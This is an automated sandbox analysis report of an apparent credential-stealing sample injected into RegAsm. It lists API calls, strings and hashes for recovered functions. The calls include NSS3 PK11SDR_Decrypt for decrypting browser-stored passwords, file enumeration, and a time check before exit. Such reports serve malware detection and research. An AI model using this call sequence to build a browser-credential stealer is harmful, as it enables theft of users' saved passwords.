Function 0040C820 Relevance: 16.6, APIs: 11, Instructions: 93stringencryptionCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040C853
lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,0133A9B8), ref: 0040C871
CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
PK11_GetInternalKeySlot.NSS3 ref: 0040C88A
PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0040C8A5
PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0040C8EB
memcpy.MSVCRT(?,?,?), ref: 0040C912
lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
PK11_FreeSlot.NSS3(?), ref: 0040C961
lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: K11_lstrcat$Slot$AuthenticateBinaryCryptDecryptFreeInternalStringlstrlenmemcpymemset
String ID:
API String ID: 3428224297-0
Opcode ID: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
Instruction ID: 73a89fe7b99aa7d2364cb4d3d60341f0774d48a816bcca14cb071eff5a8018ea
Opcode Fuzzy Hash: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
Instruction Fuzzy Hash: 694164B8944219EFDB10DFE4DD89BEEBBB8BB44304F1041A9F509A6280D7745A84CF95

Function 6C304EA0 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 408sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000007D0), ref: 6C304EFF
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C304F2E
moz_xmalloc.MOZGLUE ref: 6C304F52
memset.VCRUNTIME140(00000000,00000000), ref: 6C304F62
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C3052B2
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C3052E6
Sleep.KERNEL32(00000010), ref: 6C305481
free.MOZGLUE(?), ref: 6C305498

Strings

(, xrefs: 6C305250

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: floor$Sleep$freememsetmoz_xmalloc
String ID: (
API String ID: 4104871533-3887548279
Opcode ID: c01bb4007456b4be214daf069210be002cab155cfd9b8d384757f0b906c90287
Instruction ID: ea28c11e041ba45a40af50b1cf0775a882005b522345696e0d461538953456e5
Opcode Fuzzy Hash: c01bb4007456b4be214daf069210be002cab155cfd9b8d384757f0b906c90287
Instruction Fuzzy Hash: 95F1B172A18B508FC717CF39C85062BB7F9AFD6284F058B2EF846A7651DB3194468B81

Function 0040ED20 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 369fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0040ED3E
FindFirstFileA.KERNEL32(?,?), ref: 0040ED55
StrCmpCA.SHLWAPI(?,00421538), ref: 0040EDAB
StrCmpCA.SHLWAPI(?,0042153C), ref: 0040EDC1
FindNextFileA.KERNEL32(000000FF,?), ref: 0040F2AE
FindClose.KERNEL32(000000FF), ref: 0040F2C3

Strings

%s\*.*, xrefs: 0040ED32

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\*.*
API String ID: 180737720-1013718255
Opcode ID: 75e15ae0cdc5bd11ea3164567e07e25f29e8f588a92aa6ab9e0e53c38801dc64
Instruction ID: 3007dda49b16e6c87372febce5c45cbfe381bf5ef72a3521d52464c3f4e34f22
Opcode Fuzzy Hash: 75e15ae0cdc5bd11ea3164567e07e25f29e8f588a92aa6ab9e0e53c38801dc64
Instruction Fuzzy Hash: 41E13571912118AADB14FB61CD51EEE7338AF54314F4045EEB40A62092EF386FDACF69

Function 6C2E5190 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 331timeCOMMON

Download Yara Rule

APIs

?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C2E51DF
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C2E529C
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,00000000), ref: 6C2E52FF
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C2E536D
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C2E53F7

Part of subcall function 6C2DAB89: EnterCriticalSection.KERNEL32(6C32E370,?,?,?,6C2A34DE,6C32F6CC,?,?,?,?,?,?,?,6C2A3284), ref: 6C2DAB94
Part of subcall function 6C2DAB89: LeaveCriticalSection.KERNEL32(6C32E370,?,6C2A34DE,6C32F6CC,?,?,?,?,?,?,?,6C2A3284,?,?,6C2C56F6), ref: 6C2DABD1

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_RECORD_OVERHEADS), ref: 6C2E56C3
__Init_thread_footer.LIBCMT ref: 6C2E56E0

Strings

MOZ_PROFILER_RECORD_OVERHEADS, xrefs: 6C2E56BE

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: BaseDurationPlatformSeconds@TimeUtils@mozilla@@$CriticalSection$EnterInit_thread_footerLeavegetenv
String ID: MOZ_PROFILER_RECORD_OVERHEADS
API String ID: 1227157289-345010206
Opcode ID: 99dae4d35c8e1aadc470562a7746bcc47731dbcfa19ed6691b262f9ba75c4467
Instruction ID: 3383b0c3433f8b055e0e70b89aba0b731873eb072a98cfec46a93b75bd13afcf
Opcode Fuzzy Hash: 99dae4d35c8e1aadc470562a7746bcc47731dbcfa19ed6691b262f9ba75c4467
Instruction Fuzzy Hash: F7E19E71924F49CAC713CF398850267B7B9BF9B385F509B1EF8AA3A950DB30E4468711

Function 6C307030 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 54windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 6C307046
FormatMessageA.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000), ref: 6C307060
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C30707E

Part of subcall function 6C2B81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C2B81DE

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C307096
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C30709C
LocalFree.KERNEL32(?), ref: 6C3070AA

Strings

### ERROR: %s: %s, xrefs: 6C307087
(null), xrefs: 6C30706A, 6C307083

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: __acrt_iob_func$ErrorFormatFreeLastLocalMessage__stdio_common_vfprintffflush
String ID: ### ERROR: %s: %s$(null)
API String ID: 2989430195-1695379354
Opcode ID: 68f505c70c1801350fa09632fc4d41b706748e9d9348a256d0b418925932cabf
Instruction ID: c225bb422df0d1963130a4dcafc2322d1ec880d5ff6086dee11f2e392e4e3978
Opcode Fuzzy Hash: 68f505c70c1801350fa09632fc4d41b706748e9d9348a256d0b418925932cabf
Instruction Fuzzy Hash: A60179B1A00108AFDF049B65DC4ADEF7BBCEF49259F050429FA06A7241E67579188BA1

Function 0040DE10 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 370fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C2E), ref: 0040DE5E
StrCmpCA.SHLWAPI(?,004214C8), ref: 0040DEAE
StrCmpCA.SHLWAPI(?,004214CC), ref: 0040DEC4
FindNextFileA.KERNEL32(000000FF,?), ref: 0040E3E0
FindClose.KERNEL32(000000FF), ref: 0040E3F2

Strings

\*.*, xrefs: 0040DE26
4@, xrefs: 0040DE32, 0040E400, 0040DEF3, 0040DE75, 0040DEF6

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
String ID: 4@$\*.*
API String ID: 2325840235-1993203227
Opcode ID: c58a056e60fc9d29371130ed8fc87327b631cf5620cd3b032d2e6af9d20713bf
Instruction ID: cfdc3591377451865113f0b5848cbea5bd15bf7eccde512516250cd90852f391
Opcode Fuzzy Hash: c58a056e60fc9d29371130ed8fc87327b631cf5620cd3b032d2e6af9d20713bf
Instruction Fuzzy Hash: 5CF1D0718111189ADB15FB61DD95EEE7338AF14314F8045EFA00A62091EF386BDACF69

Function 6C2F2C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 228stringCOMMON

Download Yara Rule

APIs

?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C2F2C31
?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C2F2C61

Part of subcall function 6C2A4DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C2A4E5A
Part of subcall function 6C2A4DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C2A4E97

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C2F2C82
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C2F2E2D

Part of subcall function 6C2B81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C2B81DE

Strings

ProfileBuffer parse error: %s, xrefs: 6C2F2E3B
(root), xrefs: 6C2F354F
expected a Time entry, xrefs: 6C2F2E36

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
API String ID: 801438305-4149320968
Opcode ID: 47ebc5ab670ce4f66a062f668024d2ddc747e32d6d9cc87e73905417f9c81df7
Instruction ID: 11f4ab9273dd2019f5e1d45d2ab940cb0c7d9fb3c1133cbf92924212e67acf37
Opcode Fuzzy Hash: 47ebc5ab670ce4f66a062f668024d2ddc747e32d6d9cc87e73905417f9c81df7
Instruction Fuzzy Hash: 3891D1B46487898FC724CF24C49069EF7E5AF8A358F10491DE9AA87750DB30D94ACF53

Function 6C309E30 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 347COMMON

Download Yara Rule

APIs

__aullrem.LIBCMT ref: 6C309F3D
__aulldiv.LIBCMT ref: 6C309F77
__aullrem.LIBCMT ref: 6C309F8C
__aulldiv.LIBCMT ref: 6C30A023

Strings

NaN, xrefs: 6C309EAB
-Infinity, xrefs: 6C309E60, 6C309E7B

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: __aulldiv__aullrem
String ID: -Infinity$NaN
API String ID: 3839614884-2141177498
Opcode ID: c9d6ae94f6c196c1b2b280f62580a746025769220935bc220a12ca739a310af9
Instruction ID: adbbe0d6c5769fb8af181a2c8d2232a5908301e184341df20a8eef36d1646d95
Opcode Fuzzy Hash: c9d6ae94f6c196c1b2b280f62580a746025769220935bc220a12ca739a310af9
Instruction Fuzzy Hash: C7C19E32B043188FDB18CFA8D8907DEB7B6AB84708F144529D805ABB81D775A949CF91

Function 00416920 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(0042110C,?,?,00416B11,00000000,?,0133AAB8,?,0042110C,?,00000000,?), ref: 0041696C
sscanf.NTDLL ref: 00416999
SystemTimeToFileTime.KERNEL32(0042110C,00000000,?,?,?,?,?,?,?,?,?,?,?,0133AAB8,?,0042110C), ref: 004169B2
SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,0133AAB8,?,0042110C), ref: 004169C0
ExitProcess.KERNEL32 ref: 004169DA

Strings

B, xrefs: 004169C9

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Time$System$File$ExitProcesssscanf
String ID: B
API String ID: 2533653975-2248957098
Opcode ID: 30d4e03da22d085627275eeb363fd096e49a15e400c421c3cd1f95f2829e4b82
Instruction ID: bc3f4e88d18d0d52d27c53656958a280d832632e1993de176dacc6bdaed8f038
Opcode Fuzzy Hash: 30d4e03da22d085627275eeb363fd096e49a15e400c421c3cd1f95f2829e4b82
Instruction Fuzzy Hash: A421BAB5D14208AFDF04EFE4D9459EEB7B6FF48300F04852EE506A3250EB349645CB69

Function 6C31545C Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 305COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6C318A4B

Strings

~q*l, xrefs: 6C319459, 6C31921F, 6C315740, 6C3156C7, 6C319269, 6C315703, 6C31948F

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: memset
String ID: ~q*l
API String ID: 2221118986-3573083023
Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction ID: fdd88341aebeb08976cd5d431104d8a624e6ab0c2c2fd491a9dbc4818dd8bd56
Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction Fuzzy Hash: 7CB1F872E0421A8FDB18CF68CC907A9B7B6EF85314F1902A9C549DBB81D730A985CF91

Function 6C31542B Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 287COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6C3188F0
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C31925C

Strings

~q*l, xrefs: 6C319459, 6C31921F, 6C315740, 6C3156C7, 6C319269, 6C315703, 6C31948F

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: memset
String ID: ~q*l
API String ID: 2221118986-3573083023
Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction ID: 00c11dde342eba592da08470fdb553dc836b6053bd080c5dad08c575125c1bc6
Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction Fuzzy Hash: F0B1C672E0520A8FCB18CF58CC916A9B7B6AF85314F150279C949DBB85D730A989CF91

Function 6C3150C7 Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 280COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C318E18
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C31925C

Strings

~q*l, xrefs: 6C319459, 6C31921F, 6C315740, 6C3156C7, 6C319269, 6C315703, 6C31948F

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: memset
String ID: ~q*l
API String ID: 2221118986-3573083023
Opcode ID: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
Instruction ID: fa9a26c742ded3e053b82b71701d6ca8f4f0e6c5b6af0c0d8e53a4ce129054c3
Opcode Fuzzy Hash: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
Instruction Fuzzy Hash: E7A1F772E0421A8FCB18CF68CC90799B7B6AF85314F1502B9C949DBB45D730A999CF91

Function 6C30B910 Relevance: 9.1, APIs: 6, Instructions: 146nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 6C2B9B80: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,6C30B92D), ref: 6C2B9BC8
Part of subcall function 6C2B9B80: __Init_thread_footer.LIBCMT ref: 6C2B9BDB

rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C2B03D4,?), ref: 6C30B955
NtQueryVirtualMemory.NTDLL(00000000,?,00000000,?,0000001C,0000001C), ref: 6C30B9A5
NtQueryVirtualMemory.NTDLL(00000000,?,00000000,?,0000001C,00000000), ref: 6C30BA20
RtlNtStatusToDosError.NTDLL ref: 6C30BA7B
RtlSetLastWin32Error.NTDLL(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6C30BA81
